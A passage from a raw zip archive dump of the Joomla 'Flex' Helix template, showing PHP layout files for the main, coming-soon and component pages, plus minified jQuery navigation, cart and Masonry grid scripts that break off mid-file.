            $this->_script['text/javascript'] = preg_replace('%jQuery\(\window\)\.on\(\'load\',\s*function\(\)\s*{\s*new\s*JCaption\(\'img.caption\'\);\s*}\);\s*%', '', $this->_script['text/javascript']);
            if (empty($this->_script['text/javascript']))
                unset($this->_script['text/javascript']);
        }
        
        // Removes Mootools library	
        if($this->params->get('remove_mootools')) {
            unset($doc->_scripts[$this->baseurl . '/media/system/js/mootools-core.js']);
            unset($doc->_scripts[$this->baseurl . '/media/system/js/core.js']);
            unset($doc->_scripts[$this->baseurl . '/media/system/js/mootools-more.js']);
            unset($doc->_scripts[$this->baseurl . '/media/system/js/caption.js']);
        }
        // Custom fix for conflict with Mootools		
        if($this->params->get('mootools_fix')) {
            $doc->addScriptDeclaration('window.addEvent("domready",function(){Element.prototype.hide=function(){}});');
        }
        ?>
    
        <jdoc:include type="modules" name="debug" />
        <!-- Preloader -->
        <jdoc:include type="modules" name="helixpreloader" />
    </body>
</html>PK!��(�(flex/comingsoon.phpnu&1i�<?php
/**
 * Flex @package Helix Framework
 * Template Name - Flex
 * @author Aplikko http://www.aplikko.com
 * @copyright Copyright (c) 2020 Aplikko
 * @license http://www.gnu.org/licenses/gpl-2.0.html GNU/GPLv2 or later
*/
//no direct accees
defined ('_JEXEC') or die ('restricted access');

$doc = JFactory::getDocument();
$app = JFactory::getApplication();

//Load Helix
$helix3_path = JPATH_PLUGINS.'/system/helix3/core/helix3.php';

if (file_exists($helix3_path)) {
    require_once($helix3_path);
    $this->helix3 = Helix3::getInstance();
} else {
    die('Please install and activate helix plugin');
}

// Remove the generator meta tag
if($this->helix3->getParam('remove_joomla_generator')) {
  $doc->setGenerator(null);
}

$comingsoon_title = $this->params->get('comingsoon_title');
if( $comingsoon_title ) {
	$doc->setTitle( $comingsoon_title . ' | ' . $app->get('sitename') );
}

$comingsoon_date = explode('-', $this->params->get("comingsoon_date"));
$custom_logo_class = '';

//Load jQuery
JHtml::_('jquery.framework');
?>
<!DOCTYPE html>
<html class="sp-comingsoon" xmlns="http://www.w3.org/1999/xhtml" xml:lang="<?php echo $this->language; ?>" lang="<?php echo $this->language; ?>" dir="<?php echo $this->direction; ?>">
<head>
    <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <?php
    if($favicon = $this->helix3->getParam('favicon')) {
        $doc->addFavicon( JURI::base(true) . '/' .  $favicon);
    } else {
        $doc->addFavicon( $this->helix3->getTemplateUri() . '/images/favicon.ico' );
    }
    ?>
<jdoc:include type="head" />
    <?php
    $this->helix3->addCSS('bootstrap.min.css, font-awesome.min.css')
        ->lessInit()->setLessVariables(array(
            'preset'=>$this->helix3->Preset(),
            'bg_color'=> $this->helix3->PresetParam('_bg'),
            'text_color'=> $this->helix3->PresetParam('_text'),
            'major_color'=> $this->helix3->PresetParam('_major')
            ))
        ->addLess('master', 'template')
        ->addLess('presets',  'presets/'.$this->helix3->Preset())
    	->addJS('bootstrap.min.js, main.js, jquery.countdown.min.js');
		
		//Custom CSS
		if ($custom_css = $this->helix3->getParam('custom_css')) {
			$doc->addStyledeclaration($custom_css);
		}
		
		//Custom JS
		if ($custom_js = $this->helix3->getParam('custom_js')) {
			$doc->addScriptdeclaration($custom_js);
		}
		
//Custom background image
if($comingsoon_bg_image = $this->helix3->getParam('comingsoon_bg_image')) {
	
	$comingsoon_bg = 'background-color: transparent!important;';
    $comingsoon_bg .= 'background-image: url(' . JURI::base(true ) . '/' . $comingsoon_bg_image . ');';
    $comingsoon_bg .= 'background-repeat: no-repeat;';
    $comingsoon_bg .= 'background-size: cover;';
    $comingsoon_bg .= 'background-attachment: fixed;';
    $comingsoon_bg .= 'background-position: 50% 50%;';
    $comingsoon_bg = '.sp-comingsoon body {' . $comingsoon_bg . '}.sp-comingsoon body a.logo{background: rgba(0,0,0,0.6);}.sp-comingsoon body a.logo + .fa-clock{ opacity:0.57;}.sp-comingsoon body a.logo:hover + .fa-clock{opacity: 0.85}'; 

    $doc->addStyledeclaration( $comingsoon_bg );
}

//Body Font
$webfonts = array();

if( $this->params->get('enable_body_font') ) {
    $webfonts['body'] = $this->params->get('body_font');
}

//Heading1 Font
if( $this->params->get('enable_h1_font') ) {
    $webfonts['h1'] = $this->params->get('h1_font');
}

$this->helix3->addGoogleFont($webfonts);

$comingsoon_bg_image != '' ? $comingsoon_bg_image_class = ' class="with-bckg-img text-shadow"' : $comingsoon_bg_image_class = '';

?>
</head>
<body<?php echo $comingsoon_bg_image_class; ?>>
           <?php if( $this->helix3->getParam('comingsoon_logo') ) { ?>
           		<a class="logo" href="<?php echo $this->baseurl; ?>/"><div class="backhome hidden-xs hidden-sm"><i class="fas fa-angle-left"></i> <?php echo JText::_('HELIX_GO_BACK'); ?></div>
				<img style="max-height:150px;" class="sp-default-logo<?php echo $custom_logo_class ?>" src="<?php echo $this->helix3->getParam('comingsoon_logo') ?>" alt="<?php echo $app->get('sitename'); ?>">
                </a>
			<?php } else { ?>
				<?php if( $this->helix3->getParam('logo_image') ) { ?>
                    <a class="logo" href="<?php echo $this->baseurl; ?>/"><div class="backhome hidden-xs hidden-sm"><i class="fas fa-angle-left"></i> <?php echo JText::_('HELIX_GO_BACK'); ?></div>
                    <img style="max-height:150px;" class="sp-default-logo<?php echo $custom_logo_class ?>" src="<?php echo $this->helix3->getParam('logo_image') ?>" alt="<?php echo $app->get('sitename'); ?>">
                    </a>
                <?php } else { ?>
                    <a class="logo" href="<?php echo $this->baseurl; ?>/"><div class="backhome hidden-xs hidden-sm"><i class="fas fa-angle-left"></i> <?php echo JText::_('HELIX_GO_BACK'); ?></div><img style="width:150px;height:50%;" class="sp-default-logo<?php echo $custom_logo_class ?>" src="<?php echo $this->helix3->getTemplateUri() ?>/images/presets/<?php echo $this->helix3->Preset() ?>/logo@2x.png" alt="<?php echo $app->get('sitename'); ?>"></a>          
                <?php } ?>         
			<?php } ?>
            <div class="far fa-clock"></div>
<div class="sp-comingsoon-wrap">	
	<div class="container">
		<div class="text-center">
			<div id="sp-comingsoon">
                
				<?php if( $comingsoon_title ) { ?>
					<h1 class="sp-comingsoon-title">
						<?php echo $comingsoon_title; ?>
					</h1>
				<?php } ?>

				<?php if( $this->params->get('comingsoon_content') ) { ?>
					<div class="sp-comingsoon-content">
						<?php echo $this->params->get('comingsoon_content'); ?>
					</div>
				<?php } ?>

				<div id="sp-comingsoon-countdown" class="sp-comingsoon-countdown">
					
				</div>

				<?php if($this->countModules('comingsoon')) { ?>
				<div class="sp-position-comingsoon">
					<jdoc:include type="modules" name="comingsoon" style="sp_xhtml" />
				</div>
				<?php } ?>

				<?php
				//Social Icons
				$facebook 	= $this->helix3->getParam('facebook');
				$twitter  	= $this->helix3->getParam('twitter');
				$googleplus = $this->helix3->getParam('googleplus');
				$instagram  = $this->helix3->getParam('instagram');
				$pinterest 	= $this->helix3->getParam('pinterest');
				$youtube 	= $this->helix3->getParam('youtube');
				$linkedin 	= $this->helix3->getParam('linkedin');
				$dribbble 	= $this->helix3->getParam('dribbble');
				$behance 	= $this->helix3->getParam('behance');
				$skype 		= $this->helix3->getParam('skype');
				$whatsapp 	= $this->helix3->getParam('whatsapp');
				$flickr 		= $this->helix3->getParam('flickr');
				$vk 			= $this->helix3->getParam('vk');

				if( $this->helix3->getParam('show_social_icons') && ( $facebook || $twitter || $googleplus || $instagram || $pinterest || $youtube || $linkedin || $dribbble || $behance || $skype || $whatsapp || $flickr || $vk ) ) {
					$html  = '<ul class="social-icons">';

					if( $facebook ) {
						$html .= '<li><a target="_blank" href="'. $facebook .'" aria-label="facebook"><i class="fab fa-facebook-f" aria-hidden="true"></i></a></li>';
					}
					if( $twitter ) {
						$html .= '<li><a target="_blank" href="'. $twitter .'" aria-label="twitter"><i class="fab fa-twitter" aria-hidden="true"></i></a></li>';
					}
					if( $googleplus ) {
						$html .= '<li><a target="_blank" href="'. $googleplus .'" aria-label="GooglePlus"><i class="fab fa-google-plus-g" aria-hidden="true"></i></a></li>';
					}
					if( $instagram ) {
						$html .= '<li ><a target="_blank" href="'. $instagram .'" aria-label="Instagram"><i class="fab fa-instagram" aria-hidden="true"></i></a></li>';
					}
					if( $pinterest ) {
						$html .= '<li><a target="_blank" href="'. $pinterest .'" aria-label="Pinterest"><i class="fab fa-pinterest" aria-hidden="true"></i></a></li>';
					}
					if( $youtube ) {
						$html .= '<li><a target="_blank" href="'. $youtube .'" aria-label="Youtube"><i class="fab fa-youtube" aria-hidden="true"></i></a></li>';
					}
					if( $linkedin ) {
						$html .= '<li><a target="_blank" href="'. $linkedin .'" aria-label="LinkedIn"><i class="fab fa-linkedin" aria-hidden="true"></i></a></li>';
					}
					if( $dribbble ) {
						$html .= '<li><a target="_blank" href="'. $dribbble .'" aria-label="Dribbble"><i class="fab fa-dribbble" aria-hidden="true"></i></a></li>';
					}
					if( $behance ) {
						$html .= '<li><a target="_blank" href="'. $behance .'" aria-label="Behance"><i class="fab fa-behance" aria-hidden="true"></i></a></li>';
					}
					if( $flickr ) {
						$html .= '<li><a target="_blank" href="'. $flickr .'" aria-label="Flickr"><i class="fab fa-flickr" aria-hidden="true"></i></a></li>';
					}
					if( $vk ) {
						$html .= '<li><a target="_blank" href="'. $vk .'" aria-label="VK"><i class="fab fa-vk" aria-hidden="true"></i></a></li>';
					}
					if( $skype ) {
						$html .= '<li><a href="skype:'. $skype .'?chat" aria-label="Skype"><i class="fab fa-skype" aria-hidden="true"></i></a></li>';
					}
					if( $whatsapp ) {
						$html .= '<li><a href="whatsapp://send?abid='. $whatsapp .'&text=Hi" aria-label="WhatsApp"><i class="fab fa-whatsapp" aria-hidden="true"></i></a></li>';
					}

					$html .= '<ul>';

					echo $html;
				}
				?>
			</div>
		</div>
	</div>
</div>
<?php 
// Add JS and minify
	$countdown_js = 'jQuery(function($){
		$(\'#sp-comingsoon-countdown\').countdown(\''.trim($comingsoon_date[2]).'/'.trim($comingsoon_date[1]).'/'.trim($comingsoon_date[0]).'\', function(event) {$(this).html(event.strftime(\'<div class="days"><span class="number">%-D</span><span class="string">%!D:'.JText::_("HELIX_DAY").','.JText::_("HELIX_DAYS").';</span></div><div class="hours"><span class="number">%H</span><span class="string">%!H:'.JText::_("HELIX_HOUR").','.JText::_("HELIX_HOURS").';</span></div><div class="minutes"><span class="number">%M</span><span class="string">%!M:'.JText::_("HELIX_MINUTE").','.JText::_("HELIX_MINUTES").';</span></div><div class="seconds"><span class="number">%S</span><span class="string">%!S:'.JText::_("HELIX_SECOND").','.JText::_("HELIX_SECONDS").';</span></div>\'));
		});
	});'; 
	$countdown_js = preg_replace(array('/([\s])\1+/', '/[\n\t]+/m'), '', $countdown_js); // Remove whitespace
	$doc->addScriptdeclaration($countdown_js);	
?>
</body>
</html>PK!����flex/component.phpnu&1i�<?php
/**
 * Flex @package Helix Framework
 * Template Name - Flex
 * @author Aplikko http://www.aplikko.com
 * @copyright Copyright (c) 2020 Aplikko
 * @license http://www.gnu.org/licenses/gpl-2.0.html GNU/GPLv2 or later
*/
//no direct access
defined ('_JEXEC') or die ('resticted aceess');
?>
<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="<?php echo $this->language; ?>" lang="<?php echo $this->language; ?>" dir="<?php echo $this->direction; ?>">
<head>
    <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <?php
    $doc = JFactory::getDocument();

    if($favicon = $this->params->get('favicon')) {
        $doc->addFavicon( JURI::base(true) . '/' .  $favicon);
    } else {
        $doc->addFavicon( $this->baseurl . '/templates/'. $this->template .'/images/favicon.ico' );
    }
    ?>

    <jdoc:include type="head" />
   	<link rel="stylesheet" href="<?php echo $this->baseurl; ?>/media/jui/css/bootstrap.min.css" type="text/css" />
	<link rel="stylesheet" href="<?php echo $this->baseurl; ?>/templates/<?php echo $this->template; ?>/css/frontend-edit.css" type="text/css" />
    <link rel="stylesheet" href="<?php echo $this->baseurl; ?>/templates/<?php echo $this->template; ?>/css/template.css" type="text/css" />
</head>
<body class="contentpane">
	<jdoc:include type="message" />
	<jdoc:include type="component" />
</body>
</html>
PK!?f��	�	flex/js/jquery.nav.jsnu&1i�!function(a,b,c,d){var e=function(d,e){this.elem=d,this.$elem=a(d),this.options=e,this.metadata=this.$elem.data("plugin-options"),this.$win=a(b),this.sections={},this.didScroll=!1,this.$doc=a(c),this.docHeight=this.$doc.height()};e.prototype={defaults:{navItems:"a",currentClass:"current",changeHash:!1,easing:"swing",filter:"",scrollSpeed:750,scrollThreshold:.5,begin:!1,end:!1,scrollChange:!1},init:function(){return this.config=a.extend({},this.defaults,this.options,this.metadata),this.$nav=this.$elem.find(this.config.navItems),""!==this.config.filter&&(this.$nav=this.$nav.filter(this.config.filter)),this.$nav.on("click.onePageNav",a.proxy(this.handleClick,this)),this.getPositions(),this.bindInterval(),this.$win.on("resize.onePageNav",a.proxy(this.getPositions,this)),this},adjustNav:function(a,b){a.$elem.find("."+a.config.currentClass).removeClass(a.config.currentClass),b.addClass(a.config.currentClass)},bindInterval:function(){var b,a=this;a.$win.on("scroll.onePageNav",function(){a.didScroll=!0}),a.t=setInterval(function(){b=a.$doc.height(),a.didScroll&&(a.didScroll=!1,a.scrollChange()),b!==a.docHeight&&(a.docHeight=b,a.getPositions())},250)},getHash:function(a){return a.attr("href").split("#")[1]},getPositions:function(){var c,d,e,b=this;b.$nav.each(function(){c=b.getHash(a(this)),e=a("#"+c),e.length&&(d=e.offset().top,b.sections[c]=Math.round(d))})},getSection:function(a){var b=null,c=Math.round(this.$win.height()*this.config.scrollThreshold);for(var d in this.sections)this.sections[d]-c<a&&(b=d);return b},handleClick:function(c){var d=this,e=a(c.currentTarget),f=e.parent(),g="#"+d.getHash(e);f.hasClass(d.config.currentClass)||(d.config.begin&&d.config.begin(),d.adjustNav(d,f),d.unbindInterval(),d.scrollTo(g,function(){d.config.changeHash&&(b.location.hash=g),d.bindInterval(),d.config.end&&d.config.end()})),c.preventDefault()},scrollChange:function(){var c,a=this.$win.scrollTop(),b=this.getSection(a);null!==b&&(c=this.$elem.find('a[href$="#'+b+'"]').parent(),c.hasClass(this.config.currentClass)||(this.adjustNav(this,c),this.config.scrollChange&&this.config.scrollChange(c)))},scrollTo:function(b,c){var d=a(b).offset().top-65;a("html, body").animate({scrollTop:d},this.config.scrollSpeed,this.config.easing,c)},unbindInterval:function(){clearInterval(this.t),this.$win.unbind("scroll.onePageNav")}},e.defaults=e.prototype.defaults,a.fn.onePageNav=function(a){return this.each(function(){new e(this,a).init()})}}(jQuery,window,document);PK!��[��flex/js/vm-cart.jsnu&1i�jQuery(document).ready(function(a){function e(b){b.each(function(){var b=a(this),c=b.find('[data-type="select"]'),e=b.find(".add-to-cart"),h=b.next(".cd-customization-trigger");c.on("click",function(b){var c=a(this);if(c.toggleClass("is-open"),g(c),a(b.target).is("li")){var d=a(b.target),e=d.index()+1;d.addClass("active").siblings().removeClass("active"),c.removeClass("selected-1 selected-2 selected-3").addClass("selected-"+e),c.hasClass("color")&&f(c,e-1)}}),e.on("click",function(){d||(d=!0,g(e),e.addClass("is-added").find("path").eq(0).animate({"stroke-dashoffset":0},300,function(){setTimeout(function(){i(),e.removeClass("is-added").find(".addtocart-button").on("webkitTransitionEnd otransitionend oTransitionEnd msTransitionEnd transitionend",function(){e.find("path").eq(0).css("stroke-dashoffset","19.79"),d=!1}),a(".no-csstransitions").length>0&&(e.find("path").eq(0).css("stroke-dashoffset","19.79"),d=!1)},600)}))}),h.on("click",function(a){a.preventDefault(),g(e)})})}function f(a,b){var c=a.parent(".cd-customization").prev("a").children(".cd-slider-wrapper"),d=c.children("li");d.eq(b).removeClass("move-left").addClass("selected").prevAll().removeClass("selected").addClass("move-left").end().nextAll().removeClass("selected move-left")}function g(a){a.siblings('[data-type="select"]').removeClass("is-open").end().parents(".cd-single-item").addClass("hover").parent("li").siblings("li").find(".cd-single-item").removeClass("hover").end().find('[data-type="select"]').removeClass("is-open")}function h(){b.parent(".cd-single-item").removeClass("hover").end().find('[data-type="select"]').removeClass("is-open")}function i(){!c.hasClass("items-added")&&c.addClass("items-added");var a=c.find("span"),b=parseInt(a.text())+1;a.text(b)}var b=a(".cd-customization"),c=a(".cd-cart"),d=!1;e(b),a("body").on("click",function(b){(a(b.target).is("body")||a(b.target).is(".cd-gallery"))&&h()})}),jQuery(document).ready(function(a){var b=a("#cd-menu-trigger"),c=a(".main-content"),d=a("#cart-menu");b.on("click",function(e){e.preventDefault(),b.toggleClass("is-clicked"),d.toggleClass("shopping-menu-is-open"),c.toggleClass("shopping-menu-is-open").one("webkitTransitionEnd otransitionend oTransitionEnd msTransitionEnd transitionend",function(){a("body").toggleClass("overflow-hidden")}),a("#cd-lateral-nav").toggleClass("shopping-menu-is-open"),a("html").hasClass("no-csstransitions")&&a("body").toggleClass("overflow-hidden")}),c.on("click",function(e){a(e.target).is("#cd-menu-trigger, #cd-menu-trigger span")||(b.removeClass("is-clicked"),d.removeClass("shopping-menu-is-open"),c.removeClass("shopping-menu-is-open").one("webkitTransitionEnd otransitionend oTransitionEnd msTransitionEnd transitionend",function(){a("body").removeClass("overflow-hidden")}),a("#cd-lateral-nav").removeClass("shopping-menu-is-open"),a("html").hasClass("no-csstransitions")&&a("body").removeClass("overflow-hidden"))}),a(".item-has-children").children("a").on("click",function(b){b.preventDefault(),a(this).toggleClass("submenu-open").next(".sub-menu").slideToggle(200).end().parent(".item-has-children").siblings(".item-has-children").children("a").removeClass("submenu-open").next(".sub-menu").slideUp(200)})});

jQuery(function($) {
	if ($("body.sticky-header").length > 0) {
		$("#sp-header #cd-menu-trigger").prependTo("#sp-header #cart-menu").append("<div class=\"total_products\"></div>");
		$("#sp-header #cd-menu-trigger").prependTo("#sp-header .shopping-menu-is-open").append("<div class=\"total_products\"></div>"); 
		$(".cd-cart + .cd-cart").remove();
        $(window).on('scroll', function () {
            if ($(window).scrollTop() > 350) {
				$("#cart-menu #cd-menu-trigger").addClass("menu-is-open");
            } else {
				$("#cart-menu #cd-menu-trigger").removeClass("menu-is-open");
            }
        });
    }
});PK!7�a�^^flex/js/masonry.min.jsnu&1i�/*!
 * Masonry PACKAGED v4.2.0
 * Cascading grid layout library
 * http://masonry.desandro.com
 * MIT License
 * by David DeSandro
 */

!function(t,e){"function"==typeof define&&define.amd?define("jquery-bridget/jquery-bridget",["jquery"],function(i){return e(t,i)}):"object"==typeof module&&module.exports?module.exports=e(t,require("jquery")):t.jQueryBridget=e(t,t.jQuery)}(window,function(t,e){"use strict";function i(i,r,a){function h(t,e,n){var o,r="$()."+i+'("'+e+'")';return t.each(function(t,h){var u=a.data(h,i);if(!u)return void s(i+" not initialized. Cannot call methods, i.e. "+r);var d=u[e];if(!d||"_"==e.charAt(0))return void s(r+" is not a valid method");var l=d.apply(u,n);o=void 0===o?l:o}),void 0!==o?o:t}function u(t,e){t.each(function(t,n){var o=a.data(n,i);o?(o.option(e),o._init()):(o=new r(n,e),a.data(n,i,o))})}a=a||e||t.jQuery,a&&(r.prototype.option||(r.prototype.option=function(t){a.isPlainObject(t)&&(this.options=a.extend(!0,this.options,t))}),a.fn[i]=function(t){if("string"==typeof t){var e=o.call(arguments,1);return h(this,t,e)}return u(this,t),this},n(a))}function n(t){!t||t&&t.bridget||(t.bridget=i)}var o=Array.prototype.slice,r=t.console,s="undefined"==typeof r?function(){}:function(t){r.error(t)};return n(e||t.jQuery),i}),function(t,e){"function"==typeof define&&define.amd?define("ev-emitter/ev-emitter",e):"object"==typeof module&&module.exports?module.exports=e():t.EvEmitter=e()}("undefined"!=typeof window?window:this,function(){function t(){}var e=t.prototype;return e.on=function(t,e){if(t&&e){var i=this._events=this._events||{},n=i[t]=i[t]||[];return-1==n.indexOf(e)&&n.push(e),this}},e.once=function(t,e){if(t&&e){this.on(t,e);var i=this._onceEvents=this._onceEvents||{},n=i[t]=i[t]||{};return n[e]=!0,this}},e.off=function(t,e){var i=this._events&&this._events[t];if(i&&i.length){var n=i.indexOf(e);return-1!=n&&i.splice(n,1),this}},e.emitEvent=function(t,e){var i=this._events&&this._events[t];if(i&&i.length){var n=0,o=i[n];e=e||[];for(var r=this._onceEvents&&this._onceEvents[t];o;){var s=r&&r[o];s&&(this.off(t,o),delete r[o]),o.apply(this,e),n+=s?0:1,o=i[n]}return this}},t}),function(t,e){"use strict";"function"==typeof define&&define.amd?define("get-size/get-size",[],function(){return e()}):"object"==typeof module&&module.exports?module.exports=e():t.getSize=e()}(window,function(){"use strict";function t(t){var e=parseFloat(t),i=-1==t.indexOf("%")&&!isNaN(e);return i&&e}function e(){}function i(){for(var t={width:0,height:0,innerWidth:0,innerHeight:0,outerWidth:0,outerHeight:0},e=0;u>e;e++){var i=h[e];t[i]=0}return t}function n(t){var e=getComputedStyle(t);return e||a("Style returned "+e+". Are you running this code in a hidden iframe on Firefox? See http://bit.ly/getsizebug1"),e}function o(){if(!d){d=!0;var e=document.createElement("div");e.style.width="200px",e.style.padding="1px 2px 3px 4px",e.style.borderStyle="solid",e.style.borderWidth="1px 2px 3px 4px",e.style.boxSizing="border-box";var i=document.body||document.documentElement;i.appendChild(e);var o=n(e);r.isBoxSizeOuter=s=200==t(o.width),i.removeChild(e)}}function r(e){if(o(),"string"==typeof e&&(e=document.querySelector(e)),e&&"object"==typeof e&&e.nodeType){var r=n(e);if("none"==r.display)return i();var a={};a.width=e.offsetWidth,a.height=e.offsetHeight;for(var d=a.isBorderBox="border-box"==r.boxSizing,l=0;u>l;l++){var c=h[l],f=r[c],m=parseFloat(f);a[c]=isNaN(m)?0:m}var p=a.paddingLeft+a.paddingRight,g=a.paddingTop+a.paddingBottom,y=a.marginLeft+a.marginRight,v=a.marginTop+a.marginBottom,_=a.borderLeftWidth+a.borderRightWidth,z=a.borderTopWidth+a.borderBottomWidth,E=d&&s,b=t(r.width);b!==!1&&(a.width=b+(E?0:p+_));var x=t(r.height);return x!==!1&&(a.height=x+(E?0:g+z)),a.innerWidth=a.width-(p+_),a.innerHeight=a.height-(g+z),a.outerWidth=a.width+y,a.outerHeight=a.height+v,a}}var s,a="undefined"==typeof console?e:function(t){console.error(t)},h=["paddingLeft","paddingRight","paddingTop","paddingBottom","marginLeft","marginRight","marginTop","marginBottom","borderLeftWidth","borderRightWidth","borderTopWidth","borderBottomWidth"],u=h.length,d=!1;return r}),function(t,e){"use strict";"function"==typeof define&&define.amd?define("desandro-matches-selector/matches-selector",e):"object"==typeof module&&module.exports?module.exports=e():t.matchesSelector=e()}(window,function(){"use strict";var t=function(){var t=window.Element.prototype;if(t.matches)return"matches";if(t.matchesSelector)return"matchesSelector";for(var e=["webkit","moz","ms","o"],i=0;i<e.length;i++){var n=e[i],o=n+"MatchesSelector";if(t[o])return o}}();return function(e,i){return e[t](i)}}),function(t,e){"function"==typeof define&&define.amd?define("fizzy-ui-utils/utils",["desandro-matches-selector/matches-selector"],function(i){return e(t,i)}):"object"==typeof module&&module.exports?module.exports=e(t,require("desandro-matches-selector")):t.fizzyUIUtils=e(t,t.matchesSelector)}(window,function(t,e){var i={};i.extend=function(t,e){for(var i in e)t[i]=e[i];return t},i.modulo=function(t,e){return(t%e+e)%e},i.makeArray=function(t){var e=[];if(Array.isArray(t))e=t;else if(t&&"object"==typeof t&&"number"==typeof t.length)for(var i=0;i<t.length;i++)e.push(t[i]);else e.push(t);return e},i.removeFrom=function(t,e){var i=t.indexOf(e);-1!=i&&t.splice(i,1)},i.getParent=function(t,i){for(;t!=document.body;)if(t=t.parentNode,e(t,i))return t},i.getQueryElement=function(t){return"string"==typeof t?document.querySelector(t):t},i.handleEvent=function(t){var e="on"+t.type;this[e]&&this[e](t)},i.filterFindElements=function(t,n){t=i.makeArray(t);var o=[];return t.forEach(function(t){if(t instanceof HTMLElement){if(!n)return void o.push(t);e(t,n)&&o.push(t);for(var i=t.querySelectorAll(n),r=0;r<i.length;r++)o.push(i[r])}}),o},i.debounceMethod=function(t,e,i){var n=t.prototype[e],o=e+"Timeout";t.prototype[e]=function(){var t=this[o];t&&clearTimeout(t);var e=arguments,r=this;this[o]=setTimeout(function(){n.apply(r,e),delete r[o]},i||100)}},i.docReady=function(t){var e=document.readyState;"complete"==e||"interactive"==e?setTimeout(t):document.addEventListener("DOMContentLoaded",t)},i.toDashed=function(t){return t.replace(/(.)([A-Z])/g,function(t,e,i){return e+"-"+i}).toLowerCase()};var n=t.console;return i.htmlInit=function(e,o){i.docReady(function(){var r=i.toDashed(o),s="data-"+r,a=document.querySelectorAll("["+s+"]"),h=document.querySelectorAll(".js-"+r),u=i.makeArray(a).concat(i.makeArray(h)),d=s+"-options",l=t.jQuery;u.forEach(function(t){var i,r=t.getAttribute(s)||t.getAttribute(d);try{i=r&&JSON.parse(r)}catch(a){return void(n&&n.error("Error parsing "+s+" on "+t.className+": "+a))}var h=new e(t,i);l&&l.data(t,o,h)})})},i}),function(t,e){"function"==typeof define&&define.amd?define("outlayer/item",["ev-emitter/ev-emitter","get-size/get-size"],e):"object"==typeof module&&module.exports?module.exports=e(require("ev-emitter"),require("get-size")):(t.Outlayer={},t.Outlayer.Item=e(t.EvEmitter,t.getSize))}(window,function(t,e){"use strict";function i(t){for(var e in t)return!1;return e=null,!0}function n(t,e){t&&(this.element=t,this.layout=e,this.position={x:0,y:0},this._create())}function o(t){return t.replace(/([A-Z])/g,function(t){return"-"+t.toLowerCase()})}var r=document.documentElement.style,s="string"==typeof r.transition?"transition":"WebkitTransition",a="string"==typeof r.transform?"transform":"WebkitTransform",h={WebkitTransition:"webkitTransitionEnd",transition:"transitionend"}[s],u={transform:a,transition:s,transitionDuration:s+"Duration",transitionProperty:s+"Property",transitionDelay:s+"Delay"},d=n.prototype=Object.create(t.prototype);d.constructor=n,d._create=function(){this._transn={ingProperties:{},clean:{},onEnd:{}},this.css({position:"absolute"})},d.handleEvent=function(t){var e="on"+t.type;this[e]&&this[e](t)},d.getSize=function(){this.size=e(this.element)},d.css=function(t){var e=this.element.style;for(var i in t){var n=u[i]||i;e[n]=t[i]}},d.getPosition=function(){var t=getComputedStyle(this.element),e=this.layout._getOption("originLeft"),i=this.layout._getOption("originTop"),n=t[e?"left":"right"],o=t[i?"top":"bottom"],r=this.layout.size,s=-1!=n.indexOf("%")?parseFloat(n)/100*r.width:parseInt(n,10),a=-1!=o.indexOf("%")?parseFloat(o)/100*r.height:parseInt(o,10);s=isNaN(s)?0:s,a=isNaN(a)?0:a,s-=e?r.paddingLeft:r.paddingRight,a-=i?r.paddingTop:r.paddingBottom,this.position.x=s,this.position.y=a},d.layoutPosition=function(){var t=this.layout.size,e={},i=this.layout._getOption("originLeft"),n=this.layout._getOption("originTop"),o=i?"paddingLeft":"paddingRight",r=i?"left":"right",s=i?"right":"left",a=this.position.x+t[o];e[r]=this.getXValue(a),e[s]="";var h=n?"paddingTop":"paddingBottom",u=n?"top":"bottom",d=n?"bottom":"top",l=this.position.y+t[h];e[u]=this.getYValue(l),e[d]="",this.css(e),this.emitEvent("layout",[this])},d.getXValue=function(t){var e=this.layout._getOption("horizontal");return this.layout.options.percentPosition&&!e?t/this.layout.size.width*100+"%":t+"px"},d.getYValue=function(t){var e=this.layout._getOption("horizontal");return this.layout.options.percentPosition&&e?t/this.layout.size.height*100+"%":t+"px"},d._transitionTo=function(t,e){this.getPosition();var i=this.position.x,n=this.position.y,o=parseInt(t,10),r=parseInt(e,10),s=o===this.position.x&&r===this.position.y;if(this.setPosition(t,e),s&&!this.isTransitioning)return void this.layoutPosition();var a=t-i,h=e-n,u={};u.transform=this.getTranslate(a,h),this.transition({to:u,onTransitionEnd:{transform:this.layoutPosition},isCleaning:!0})},d.getTranslate=function(t,e){var i=this.layout._getOption("originLeft"),n=this.layout._getOption("originTop");return t=i?t:-t,e=n?e:-e,"translate3d("+t+"px, "+e+"px, 0)"},d.goTo=function(t,e){this.setPosition(t,e),this.layoutPosition()},d.moveTo=d._transitionTo,d.setPosition=function(t,e){this.position.x=parseInt(t,10),this.position.y=parseInt(e,10)},d._nonTransition=function(t){this.css(t.to),t.isCleaning&&this._removeStyles(t.to);for(var e in t.onTransitionEnd)t.onTransitionEnd[e].call(this)},d.transition=function(t){if(!parseFloat(this.layout.options.transitionDuration))return void this._nonTransition(t);var e=this._transn;for(var i in t.onTransitionEnd)e.onEnd[i]=t.onTransitionEnd[i];for(i in t.to)e.ingProperties[i]=!0,t.isCleaning&&(e.clean[i]=!0);if(t.from){this.css(t.from);var n=this.element.offsetHeight;n=null}this.enableTransition(t.to),this.css(t.to),this.isTransitioning=!0};var l="opacity,"+o(a);d.enableTransition=function(){if(!this.isTransitioning){var t=this.layout.options.transitionDuration;t="number"==typeof t?t+"ms":t,this.css({transitionProperty:l,transitionDuration:t,transitionDelay:this.staggerDelay||0}),this.element.addEventListener(h,this,!1)}},d.onwebkitTransitionEnd=function(t){this.ontransitionend(t)},d.onotransitionend=function(t){this.ontransitionend(t)};var c={"-webkit-transform":"transform"};d.ontransitionend=function(t){if(t.target===this.element){var e=this._transn,n=c[t.propertyName]||t.propertyName;if(delete e.ingProperties[n],i(e.ingProperties)&&this.disableTransition(),n in e.clean&&(this.element.style[t.propertyName]="",delete e.clean[n]),n in e.onEnd){var o=e.onEnd[n];o.call(this),delete e.onEnd[n]}this.emitEvent("transitionEnd",[this])}},d.disableTransition=function(){this.removeTransitionStyles(),this.element.removeEventListener(h,this,!1),this.isTransitioning=!1},d._removeStyles=function(t){var e={};for(var i in t)e[i]="";this.css(e)};var f={transitionProperty:"",transitionDuration:"",transitionDelay:""};return 